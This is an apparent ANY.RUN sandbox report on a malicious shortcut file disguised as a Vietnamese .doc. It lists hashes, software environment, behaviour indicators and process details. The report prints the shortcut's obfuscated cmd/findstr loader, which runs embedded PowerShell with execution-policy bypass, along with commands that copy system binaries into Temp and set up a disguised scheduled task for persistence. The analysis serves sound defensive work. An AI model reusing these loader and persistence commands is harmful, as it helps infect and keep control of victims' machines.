General Info

File name

TKCT quy I nam 2019.doc.lnk.malw

Full analysis
https://app.any.run/tasks/748eccd0-8a7c-4401-81ef-0902419819de
Verdict
Malicious activity
Analysis date
3/14/2019, 15:45:40
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:

MIME:
application/octet-stream
File info:
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=1, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized
MD5

80bcda9fde78c70566c6f693f1c7938f

SHA1

579c2c17e40a70bef8fe4b2ba0efde2be89b216c

SHA256

0476ec8b4cb1b5dd368be52d9249f5b3cf6709b3141e9d02814c05f61cb90a91

SSDEEP

1536:1W4FUzI49mN+Ylv/j7OrvtqV734Uxe5VsKihr9uQZ0TEH1V8ajr5EUwTsG1hdUw2:H530U349VArO48ErKBL53Ut

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Loads dropped or rewritten executable
  • InstallUtil.exe (PID: 2668)
  • InstallUtil.exe (PID: 2808)
  • InstallUtil.exe (PID: 3516)
Application was dropped or rewritten from another process
  • InstallUtil.exe (PID: 2668)
  • winwsh.exe (PID: 3416)
  • InstallUtil.exe (PID: 3516)
  • winwsh.exe (PID: 2196)
  • InstallUtil.exe (PID: 2808)
  • winwsh.exe (PID: 2608)
Uses Task Scheduler to run other applications
  • powershell.exe (PID: 2968)
  • powershell.exe (PID: 2908)
Loads the Task Scheduler COM API
  • schtasks.exe (PID: 884)
  • schtasks.exe (PID: 3512)
  • schtasks.exe (PID: 1420)
  • schtasks.exe (PID: 3060)
Executes PowerShell scripts
  • cmd.exe (PID: 2152)
Executable content was dropped or overwritten
  • cmd.exe (PID: 2588)
  • powershell.exe (PID: 2968)
  • cmd.exe (PID: 2556)
  • cmd.exe (PID: 3880)
  • powershell.exe (PID: 2908)
Starts CMD.EXE for commands execution
  • powershell.exe (PID: 2968)
  • cmd.exe (PID: 2152)
  • powershell.exe (PID: 2908)
Starts Microsoft Office Application
  • powershell.exe (PID: 2968)
  • powershell.exe (PID: 2908)
Creates files in the user directory
  • powershell.exe (PID: 2968)
  • powershell.exe (PID: 2908)
Application launched itself
  • cmd.exe (PID: 2152)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 636)
  • WINWORD.EXE (PID: 3596)
Creates files in the user directory
  • WINWORD.EXE (PID: 3596)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.lnk
|   Windows Shortcut (100%)
EXIF
LNK
Flags:
IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString
FileAttributes:
Archive
CreateDate:
2010:11:21 04:24:03+01:00
AccessDate:
2010:11:21 04:24:03+01:00
ModifyDate:
2010:11:21 04:24:03+01:00
TargetFileSize:
302592
IconIndex:
1
RunWindow:
Show Minimized No Activate
HotKey:
(none)
TargetFileDOSName:
cmd.exe
DriveType:
Fixed Disk
VolumeLabel:
null
LocalBasePath:
C:\Windows\System32\cmd.exe
RelativePath:
..\..\..\..\Windows\System32\cmd.exe
CommandLineArguments:
/c f%windir:~4,1%ndstr /b /i "iex" "%cd%\TKCT quy I nam 2019.doc.lnk">%temp%\%windir:~-1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%%windir:~-1,1% -file %temp%\%windir:~-1,1%.ps1&for /f "delims==" %i in ('dir "%temp%\TKCT quy I nam 2019.doc.lnk" /s /b') do f%windir:~4,1%ndstr /b /i "iex" "%i">%temp%\%windir:~-1,1%.ps1&p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%s -file %temp%\%windir:~-1,1%.ps1
IconFileName:
%SystemRoot%\system32\SHELL32.dll
MachineID:
win-2a9b78ts069

Screenshots

Processes

Total processes
63
Monitored processes
24
Malicious processes
8
Suspicious processes
1

Behavior graph

+
start rundll32.exe no specs explorer.exe no specs cmd.exe no specs findstr.exe no specs powershell.exe winword.exe no specs cmd.exe cmd.exe schtasks.exe no specs schtasks.exe no specs cmd.exe no specs findstr.exe no specs winwsh.exe no specs powershell.exe installutil.exe winword.exe no specs cmd.exe no specs cmd.exe schtasks.exe no specs schtasks.exe no specs winwsh.exe no specs installutil.exe no specs winwsh.exe no specs installutil.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2924
CMD
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\TKCT quy I nam 2019.doc.lnk.malw
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\propsys.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\uxtheme.dll

PID
2376
CMD
"C:\Windows\explorer.exe"
Path
C:\Windows\explorer.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Explorer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\explorer.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\slc.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\propsys.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\actxprxy.dll

PID
2152
CMD
"C:\Windows\System32\cmd.exe" /c f%windir:~4,1%ndstr /b /i "iex" "%cd%\TKCT quy I nam 2019.doc.lnk">C:\Users\admin\AppData\Local\Temp\%windir:~-1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%%windir:~-1,1% -file C:\Users\admin\AppData\Local\Temp\%windir:~-1,1%.ps1&for /f "delims==" %i in ('dir "C:\Users\admin\AppData\Local\Temp\TKCT quy I nam 2019.doc.lnk" /s /b') do f%windir:~4,1%ndstr /b /i "iex" "%i">C:\Users\admin\AppData\Local\Temp\%windir:~-1,1%.ps1&p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec bypa%windir:~-1,1%s -file C:\Users\admin\AppData\Local\Temp\%windir:~-1,1%.ps1
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\findstr.exe

PID
2736
CMD
findstr /b /i "iex" "C:\Users\admin\AppData\Local\Temp\TKCT quy I nam 2019.doc.lnk"
Path
C:\Windows\system32\findstr.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Find String (QGREP) Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\findstr.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2908
CMD
powershell.exe -exec bypass -file C:\Users\admin\AppData\Local\Temp\s.ps1
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\msiltcfg.dll
c:\windows\system32\msi.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\sxs.dll
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\cmd.exe
c:\windows\system32\schtasks.exe
c:\windows\system32\netutils.dll

PID
3596
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bai.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\program files\microsoft office\office14\gkword.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\windows\system32\shdocvw.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll

PID
3880
CMD
"C:\Windows\system32\cmd.exe" /c copy /y C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe C:\Users\admin\AppData\Local\Temp\InstallUtil.exe
Path
C:\Windows\system32\cmd.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2556
CMD
"C:\Windows\system32\cmd.exe" /c copy /y C:\Windows\system32\wscript.exe C:\Users\admin\AppData\Local\Temp\winwsh.exe
Path
C:\Windows\system32\cmd.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3060
CMD
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 3 /tn "Security Script kb00769670" /tr "C:\Users\admin\AppData\Local\Temp\winwsh.exe //Nologo //E:vbscript //B C:\Users\admin\AppData\Local\Temp\Win629052.txt" /F
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
1420
CMD
"C:\Windows\system32\schtasks.exe" /run /tn "Security Script kb00769670"
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll

PID
3756
CMD
C:\Windows\system32\cmd.exe /c dir "C:\Users\admin\AppData\Local\Temp\TKCT quy I nam 2019.doc.lnk" /s /b
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3912
CMD
findstr /b /i "iex" "C:\Users\admin\AppData\Local\Temp\TKCT quy I nam 2019.doc.lnk"
Path
C:\Windows\system32\findstr.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Find String (QGREP) Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\findstr.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
2608
CMD
C:\Users\admin\AppData\Local\Temp\winwsh.exe //Nologo //E:vbscript //B C:\Users\admin\AppData\Local\Temp\Win629052.txt
Path
C:\Users\admin\AppData\Local\Temp\winwsh.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
